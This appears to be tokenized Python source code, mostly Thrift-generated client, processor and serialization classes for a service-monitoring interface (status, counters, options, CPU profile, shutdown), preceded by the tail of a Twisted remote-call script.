. callRemote ( '<STR_LIT>' ) <EOL> d . addCallbacks ( printValue , printError ) <EOL> ds . append ( d ) <EOL> d = proxy . callRemote ( '<STR_LIT:none>' ) <EOL> d . addCallbacks ( printValue , printError ) <EOL> ds . append ( d ) <EOL> ds = defer . DeferredList ( ds ) <EOL> ds . addCallback ( shutDown ) <EOL> reactor . run ( ) </s>
<s> from thrift . Thrift import * <EOL> from ttypes import * <EOL> from thrift . Thrift import TProcessor <EOL> from thrift . transport import TTransport <EOL> from thrift . protocol import TBinaryProtocol , TProtocol <EOL> try : <EOL> from thrift . protocol import fastbinary <EOL> except : <EOL> fastbinary = None <EOL> class Iface : <EOL> """<STR_LIT>""" <EOL> def getName ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getVersion ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getStatus ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getStatusDetails ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getCounters ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getCounter ( self , key ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setOption ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getOption ( self , key ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getOptions ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getCpuProfile ( self , profileDurationInSec ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def aliveSince ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def reinitialize ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def shutdown ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Client ( Iface ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , iprot , oprot = None ) : <EOL> self . _iprot = self . _oprot = iprot <EOL> if oprot != None : <EOL> self . _oprot = oprot <EOL> self . _seqid = <NUM_LIT:0> <EOL> def getName ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getName ( ) <EOL> return self . recv_getName ( ) <EOL> def send_getName ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getName_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getName ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getName_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getVersion ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getVersion ( ) <EOL> return self . recv_getVersion ( ) <EOL> def send_getVersion ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getVersion_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getVersion ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getVersion_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getStatus ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getStatus ( ) <EOL> return self . recv_getStatus ( ) <EOL> def send_getStatus ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getStatus_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getStatus ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getStatus_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getStatusDetails ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getStatusDetails ( ) <EOL> return self . recv_getStatusDetails ( ) <EOL> def send_getStatusDetails ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getStatusDetails_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getStatusDetails ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getStatusDetails_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getCounters ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getCounters ( ) <EOL> return self . recv_getCounters ( ) <EOL> def send_getCounters ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getCounters_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getCounters ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getCounters_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getCounter ( self , key ) : <EOL> """<STR_LIT>""" <EOL> self . send_getCounter ( key ) <EOL> return self . recv_getCounter ( ) <EOL> def send_getCounter ( self , key ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getCounter_args ( ) <EOL> args . key = key <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getCounter ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getCounter_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def setOption ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> self . send_setOption ( key , value ) <EOL> self . recv_setOption ( ) <EOL> def send_setOption ( self , key , value ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = setOption_args ( ) <EOL> args . key = key <EOL> args . value = value <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_setOption ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = setOption_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> return <EOL> def getOption ( self , key ) : <EOL> """<STR_LIT>""" <EOL> self . send_getOption ( key ) <EOL> return self . recv_getOption ( ) <EOL> def send_getOption ( self , key ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getOption_args ( ) <EOL> args . key = key <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getOption ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getOption_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getOptions ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getOptions ( ) <EOL> return self . recv_getOptions ( ) <EOL> def send_getOptions ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getOptions_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getOptions ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getOptions_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getCpuProfile ( self , profileDurationInSec ) : <EOL> """<STR_LIT>""" <EOL> self . send_getCpuProfile ( profileDurationInSec ) <EOL> return self . recv_getCpuProfile ( ) <EOL> def send_getCpuProfile ( self , profileDurationInSec ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getCpuProfile_args ( ) <EOL> args . profileDurationInSec = profileDurationInSec <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getCpuProfile ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getCpuProfile_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def aliveSince ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_aliveSince ( ) <EOL> return self . recv_aliveSince ( ) <EOL> def send_aliveSince ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = aliveSince_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_aliveSince ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = aliveSince_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def reinitialize ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_reinitialize ( ) <EOL> def send_reinitialize ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = reinitialize_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def shutdown ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_shutdown ( ) <EOL> def send_shutdown ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = shutdown_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> class Processor ( Iface , TProcessor ) : <EOL> def __init__ ( self , handler ) : <EOL> self . _handler = handler <EOL> self . _processMap = { } <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getName <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getVersion <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getStatus <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getStatusDetails <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getCounters <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getCounter <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_setOption <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getOption <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getOptions <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getCpuProfile <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_aliveSince <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_reinitialize <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_shutdown <EOL> def process ( self , iprot , oprot ) : <EOL> ( name , type , seqid ) = iprot . readMessageBegin ( ) <EOL> if name not in self . _processMap : <EOL> iprot . skip ( TType . STRUCT ) <EOL> iprot . readMessageEnd ( ) <EOL> x = TApplicationException ( TApplicationException . UNKNOWN_METHOD , '<STR_LIT>' % ( name ) ) <EOL> oprot . writeMessageBegin ( name , TMessageType . EXCEPTION , seqid ) <EOL> x . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> return <EOL> else : <EOL> self . _processMap [ name ] ( self , seqid , iprot , oprot ) <EOL> return True <EOL> def process_getName ( self , seqid , iprot , oprot ) : <EOL> args = getName_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getName_result ( ) <EOL> result . success = self . _handler . getName ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getVersion ( self , seqid , iprot , oprot ) : <EOL> args = getVersion_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getVersion_result ( ) <EOL> result . success = self . _handler . getVersion ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getStatus ( self , seqid , iprot , oprot ) : <EOL> args = getStatus_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getStatus_result ( ) <EOL> result . success = self . _handler . getStatus ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getStatusDetails ( self , seqid , iprot , oprot ) : <EOL> args = getStatusDetails_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getStatusDetails_result ( ) <EOL> result . success = self . _handler . getStatusDetails ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getCounters ( self , seqid , iprot , oprot ) : <EOL> args = getCounters_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getCounters_result ( ) <EOL> result . success = self . _handler . getCounters ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getCounter ( self , seqid , iprot , oprot ) : <EOL> args = getCounter_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getCounter_result ( ) <EOL> result . success = self . _handler . getCounter ( args . key ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_setOption ( self , seqid , iprot , oprot ) : <EOL> args = setOption_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = setOption_result ( ) <EOL> self . _handler . setOption ( args . key , args . value ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getOption ( self , seqid , iprot , oprot ) : <EOL> args = getOption_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getOption_result ( ) <EOL> result . success = self . _handler . getOption ( args . key ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getOptions ( self , seqid , iprot , oprot ) : <EOL> args = getOptions_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getOptions_result ( ) <EOL> result . success = self . _handler . getOptions ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_getCpuProfile ( self , seqid , iprot , oprot ) : <EOL> args = getCpuProfile_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = getCpuProfile_result ( ) <EOL> result . success = self . _handler . getCpuProfile ( args . profileDurationInSec ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_aliveSince ( self , seqid , iprot , oprot ) : <EOL> args = aliveSince_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = aliveSince_result ( ) <EOL> result . success = self . _handler . aliveSince ( ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_reinitialize ( self , seqid , iprot , oprot ) : <EOL> args = reinitialize_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> self . _handler . reinitialize ( ) <EOL> return <EOL> def process_shutdown ( self , seqid , iprot , oprot ) : <EOL> args = shutdown_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> self . _handler . shutdown ( ) <EOL> return <EOL> class getName_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getName_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getVersion_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getVersion_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRING , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getStatus_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class getStatus_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( 